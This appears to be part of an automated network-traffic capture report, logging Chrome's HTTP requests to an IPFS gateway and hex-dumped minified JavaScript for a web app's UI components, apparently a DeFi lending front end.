                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 33 33 39 64 32 34 33 66 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43339d243f8-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 30 36 5d 2c 7b 36 34 32 38 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 6f 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 72 3d 6f 28 36 33 33 36 36 29 2c 61 3d 6f 28 38 37 34 36 32 29 2c 69 3d 6f 28 36 37 32 39 34 29 2c 6e 3d 6f 28 38 36 30 31 30 29 2c 73 3d 6f 28 32 38 33 32 30 29 2c 64 3d 6f 28 33 34 38 36 37 29 2c 6c 3d 6f 28 39 34 37 38 30 29 2c 63 3d 6f 28 32 39 36 32 38 29 2c 75 3d 6f 28 31 33 32 36 34 29 2c 70 3d 6f 28 36 36 35 30 30 29 2c 6d 3d 6f 28 38 35 38 39 33 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1506],{64288:function(e,t,o){o.d(t,{Z:function(){return y}});var r=o(63366),a=o(87462),i=o(67294),n=o(86010),s=o(28320),d=o(34867),l=o(94780),c=o(29628),u=o(13264),p=o(66500),m=o(85893)
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 64 74 68 26 26 7b 5b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 70 28 22 78 73 22 29 5d 3a 7b 6d 61 78 57 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 2e 78 73 2c 34 34 34 29 7d 7d 2c 74 2e 6d 61 78 57 69 64 74 68 26 26 22 78 73 22 21 3d 3d 74 2e 6d 61 78 57 69 64 74 68 26 26 7b 5b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 70 28 74 2e 6d 61 78 57 69 64 74 68 29 5d 3a 7b 6d 61 78 57 69 64 74 68 3a 60 24 7b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 5b 74 2e 6d 61 78 57 69 64 74 68 5d 7d 24 7b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 6e 69 74 7d 60 7d 7d 29 29 29 2c 70 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 69
                                                                                                                                                                                                                                                  Data Ascii: dth&&{[e.breakpoints.up("xs")]:{maxWidth:Math.max(e.breakpoints.values.xs,444)}},t.maxWidth&&"xs"!==t.maxWidth&&{[e.breakpoints.up(t.maxWidth)]:{maxWidth:`${e.breakpoints.values[t.maxWidth]}${e.breakpoints.unit}`}}))),p=i.forwardRef((function(e,t){const i
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 69 75 6d 22 2c 22 73 69 7a 65 4c 61 72 67 65 22 5d 29 2c 67 3d 6f 28 38 35 38 39 33 29 3b 63 6f 6e 73 74 20 62 3d 5b 22 63 68 69 6c 64 72 65 6e 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6c 6f 72 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 46 6f 63 75 73 52 69 70 70 6c 65 22 2c 22 66 75 6c 6c 57 69 64 74 68 22 2c 22 6f 6e 43 68 61 6e 67 65 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 73 65 6c 65 63 74 65 64 22 2c 22 73 69 7a 65 22 2c 22 76 61 6c 75 65 22 5d 2c 76 3d 28 30 2c 70 2e 5a 50 29 28 6c 2e 5a 2c 7b 6e 61 6d 65 3a 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6f 77 6e 65 72 53 74 61 74 65
                                                                                                                                                                                                                                                  Data Ascii: ium","sizeLarge"]),g=o(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],v=(0,p.ZP)(l.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 6f 7d 20 2f 20 63 61 6c 63 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 73 65 6c 65 63 74 65 64 4f 70 61 63 69 74 79 7d 20 2b 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 29 60 3a 28 30 2c 64 2e 46 71 29 28 72 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 73 65 6c 65 63 74 65 64 4f 70 61 63 69 74 79 2b 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 29 2c 22 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 20 6e 6f 6e 65 29 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 6f 7d 20
                                                                                                                                                                                                                                                  Data Ascii: kgroundColor:e.vars?`rgba(${o} / calc(${e.vars.palette.action.selectedOpacity} + ${e.vars.palette.action.hoverOpacity}))`:(0,d.Fq)(r,e.palette.action.selectedOpacity+e.palette.action.hoverOpacity),"@media (hover: none)":{backgroundColor:e.vars?`rgba(${o}
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 32 32 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 69 6e 64 65 78 4f 66 28 65 29 3e 3d 30 3a 65 3d 3d 3d 74 29 7d 76 61 72 20 70 3d 6f 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 5a 29 28 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 2c 65 29 7d 76 61 72 20 68 3d 28 30 2c 6f 28 31 35 38 38 29 2e 5a 29 28 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 2c 5b 22 72 6f 6f 74 22 2c 22 73 65 6c 65 63 74 65 64 22 2c 22 76 65 72 74 69 63 61 6c 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 67 72 6f 75 70 65 64 22 2c
                                                                                                                                                                                                                                                  Data Ascii: 22);function u(e,t){return void 0!==t&&void 0!==e&&(Array.isArray(t)?t.indexOf(e)>=0:e===t)}var p=o(34867);function m(e){return(0,p.Z)("MuiToggleButtonGroup",e)}var h=(0,o(1588).Z)("MuiToggleButtonGroup",["root","selected","vertical","disabled","grouped",
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1267INData Raw: 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61 64 69 75 73 3a 30 7d 2c 5b 60 26 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 20 2b 20 2e 24 7b 68 2e 67 72 6f 75 70 65 64 7d 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 60 5d 3a 7b 62 6f 72 64 65 72 54 6f 70 3a 30 2c 6d 61 72 67 69 6e 54 6f 70 3a 30 7d 7d 29 7d 29 29 29 3b 76 61 72 20 76 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6f 3d 28 30 2c 6c 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 7d 29 2c 7b 63 68 69 6c 64 72 65 6e 3a 64 2c 63 6c 61 73 73 4e 61 6d 65 3a 70 2c 63 6f 6c 6f 72 3a 68 3d 22 73 74
                                                                                                                                                                                                                                                  Data Ascii: derBottomLeftRadius:0,borderBottomRightRadius:0},[`&.${h.selected} + .${h.grouped}.${h.selected}`]:{borderTop:0,marginTop:0}})})));var v=i.forwardRef((function(e,t){const o=(0,l.Z)({props:e,name:"MuiToggleButtonGroup"}),{children:d,className:p,color:h="st


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  87192.168.2.549804209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/1573-73b9595d97d74de8.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 14192
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifxa7pp5makjhtm4fztcen6pvq6nqmjzv2kbatfdvehnsnfxlrihe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1573-73b9595d97d74de8.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifxa7pp5makjhtm4fztcen6pvq6nqmjzv2kbatfdvehnsnfxlrihe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98750
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 33 65 38 38 36 31 38 38 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e433e8861889-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 37 33 5d 2c 7b 35 37 38 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 6d 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 2c 6f 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 7d 2c 58 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 42 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 4a 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 61 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 2c 6a 7a 3a 66 75
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:fu
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2e 67 61 73 4c 69 6d 69 74 2c 72 3d 65 2e 73 6c 69 70 70 61 67 65 53 65 6c 65 63 74 6f 72 2c 74 3d 65 2e 73 6b 69 70 4c 6f 61 64 2c 69 3d 65 2e 64 69 73 61 62 6c 65 64 2c 6f 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 73 3d 65 2e 63 68 61 69 6e 49 64 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 73 29 28 63 2e 5a 2c 7b 73 78 3a 7b 70 74 3a 35 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 4f 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 7d 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 54 72 61 6e 73 61 63 74 69 6f 6e 20 6f 76 65 72 76 69 65 77 22 7d 29 7d 29 2c 28 30 2c 4f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: .gasLimit,r=e.slippageSelector,t=e.skipLoad,i=e.disabled,o=e.children,s=e.chainId;return(0,O.jsxs)(c.Z,{sx:{pt:5},children:[(0,O.jsx)(l.Z,{sx:{mb:1},color:"text.secondary",children:(0,O.jsx)(a.cC,{id:"Transaction overview"})}),(0,O.jsx)(c.Z,{sx:function(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 67 2c 6a 3d 76 6f 69 64 20 30 21 3d 3d 70 26 26 70 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 6e 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 65 6e 64 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 6a 3f 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 4f 2e 6a 73 78 29 28 64 2e 5a 2c 7b 76 61 72 69 61
                                                                                                                                                                                                                                                  Data Ascii: g,j=void 0!==p&&p;return(0,O.jsx)(h.X,{caption:n,captionVariant:"description",mb:4,align:"flex-start",children:(0,O.jsx)(c.Z,{sx:{display:"flex",flexDirection:"column",alignItems:"flex-end"},children:j?(0,O.jsxs)(O.Fragment,{children:[(0,O.jsx)(d.Z,{varia
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 6e 3d 7b 7d 2c 28 30 2c 74 2e 5a 29 28 6e 2c 76 2e 7a 2e 45 4e 41 42 4c 45 44 2c 28 30 2c 4f 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f 72 3a 22 73 75 63 63 65 73 73 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 45 6e 61 62 6c 65 64 22 7d 29 7d 29 29 2c 28 30 2c 74 2e 5a 29 28 6e 2c 76 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 45 4e 41 42 4c 45 44 2c 28 30 2c 4f 2e 6a 73 78 29 28 6a 2e 43 68 2c 7b 74 79 70 6f 67 72 61 70 68 79 50 72 6f 70 73 3a 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: flex",alignItems:"center"},children:(n={},(0,t.Z)(n,v.z.ENABLED,(0,O.jsx)(l.Z,{variant:"description",color:"success.main",children:(0,O.jsx)(a.cC,{id:"Enabled"})})),(0,t.Z)(n,v.z.ISOLATED_ENABLED,(0,O.jsx)(j.Ch,{typographyProps:{variant:"description",colo
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 7b 76 61 72 20 6e 3d 65 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 2c 72 3d 65 2e 66 75 74 75 72 65 48 65 61 6c 74 68 46 61 63 74 6f 72 2c 74 3d 65 2e 76 69 73 69 62 6c 65 48 66 43 68 61 6e 67 65 2c 69 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6f 3d 76 6f 69 64 20 30 21 3d 3d 69 26 26 69 3b 72 65 74 75 72 6e 22 2d 31 22 3d 3d 3d 6e 26 26 22 2d 31 22 3d 3d 3d 72 3f 6e 75 6c 6c 3a 28 30 2c 4f 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 48 65 61 6c 74 68 20 66 61 63 74 6f 72 22 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 73 29
                                                                                                                                                                                                                                                  Data Ascii: {var n=e.healthFactor,r=e.futureHealthFactor,t=e.visibleHfChange,i=e.loading,o=void 0!==i&&i;return"-1"===n&&"-1"===r?null:(0,O.jsx)(h.X,{caption:(0,O.jsx)(a.cC,{id:"Health factor"}),captionVariant:"description",mb:4,align:"flex-start",children:(0,O.jsxs)
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 74 3d 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 74 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                  Data Ascii: wnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function g(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 7d 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 70 72 6f 76 65 42 75 74 74 6f 6e 43 68 61 6e 67 65 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6d 2e 6a 73 78 29 28 78 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 63 6f 6c 6f 72 3a 22 69 6e 66 6f 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 7b 63 75 72 72 65 6e 74 4d 65 74 68 6f 64 7d 22 2c 76 61 6c 75 65 73 3a 7b 63 75 72 72 65 6e 74 4d 65 74 68 6f 64 3a 6e 7d 7d 29 7d 29 2c 28 30 2c 6d 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 31 36 2c 6d 6c 3a 31
                                                                                                                                                                                                                                                  Data Ascii: lay:"flex",alignItems:"center",cursor:"pointer"},"data-cy":"approveButtonChange",children:[(0,m.jsx)(x.Z,{variant:"subheader2",color:"info.main",children:(0,m.jsx)(a.cC,{id:"{currentMethod}",values:{currentMethod:n}})}),(0,m.jsx)(s.Z,{sx:{fontSize:16,ml:1
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 76 61 72 20 6e 3d 65 2e 61 70 70 72 6f 76 61 6c 48 61 73 68 2c 72 3d 65 2e 74 72 79 50 65 72 6d 69 74 2c 74 3d 28 30 2c 4e 2e 59 29 28 29 2c 69 3d 74 2e 77 61 6c 6c 65 74 41 70 70 72 6f 76 61 6c 4d 65 74 68 6f 64 50 72 65 66 65 72 65 6e 63 65 2c 6f 3d 74 2e 73 65 74 57 61 6c 6c 65 74 41 70 70 72 6f 76 61 6c 4d 65 74 68 6f 64 50 72 65 66 65 72 65 6e 63 65 2c 73 3d 72 26 26 69 2c 6c 3d 28 30 2c 6b 2e 66 29 28 29 2e 63 75 72 72 65 6e 74 4e 65 74 77 6f 72 6b 43 6f 6e 66 69 67 2c 64 3d 6e 3d 3d 3d 42 2e 5a 3b 72 65 74 75 72 6e 20 6e 7c 7c 64 7c 7c 21 72 3f 6e 26 26 21 73 3f 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 61
                                                                                                                                                                                                                                                  Data Ascii: var n=e.approvalHash,r=e.tryPermit,t=(0,N.Y)(),i=t.walletApprovalMethodPreference,o=t.setWalletApprovalMethodPreference,s=r&&i,l=(0,k.f)().currentNetworkConfig,d=n===B.Z;return n||d||!r?n&&!s?(0,m.jsx)(c.Z,{sx:{display:"flex",justifyContent:"flex-start",a
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 5f 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 74 2e 5a 29 28 65 2c 6e 2c 72 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 5f 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: h;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?_(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):_(Object(r)).forEach((function(n){Object.definePr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  88192.168.2.549807209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC645OUTGET /manifest.json HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
